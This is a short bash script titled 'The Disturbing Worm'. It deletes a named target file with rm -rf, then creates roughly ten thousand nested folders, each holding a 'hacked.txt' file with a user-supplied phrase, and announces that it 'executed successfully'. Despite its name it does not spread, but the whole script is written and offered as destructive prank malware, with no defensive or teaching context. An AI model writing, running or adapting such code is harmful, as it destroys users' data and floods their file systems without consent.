# Counter that determines number of repetitions of corruption.

# Increase to heat your room.

corruption\_counter=101

# Target files to be deleted

targets=("$HOME/desktop/to\_be\_deleted.txt")

# Go to the file's current directory

cd "$(dirname "${BASH\_SOURCE[0]}")"

# Greeting

echo -e "\n---- The Disturbing Worm ----\n"

# Take user input

echo -e "Enter your phase:\n"

# Read user phrase

read -r phrase

# Create the folders

for ((i = 0; i < corruption\_counter; i++)); do

mkdir "./$i"

done

# Iterate over the target list and destroy

for target in "${targets[@]}"; do

rm -rf "$target"

done

# Create corruption\_counter number of folders and inside each create corruption\_counter number

# of folders AND inside of each folder create corruption\_counter number of hacked.txt files. LOL.

for ((top\_index = 0; top\_index < corruption\_counter; top\_index++)); do

for ((folder\_index = 0; folder\_index < corruption\_counter; folder\_index++)); do

# Create intermediate folder and then create hacked.txt file

mkdir "./$top\_index/$folder\_index" && echo "$phrase" > "./$top\_index/$folder\_index/hacked.txt"

done

done

# Goodbye text

echo "Wrom executed successfully."

echo -e "\n---- The Disturbing Worm ----\n"

exit 0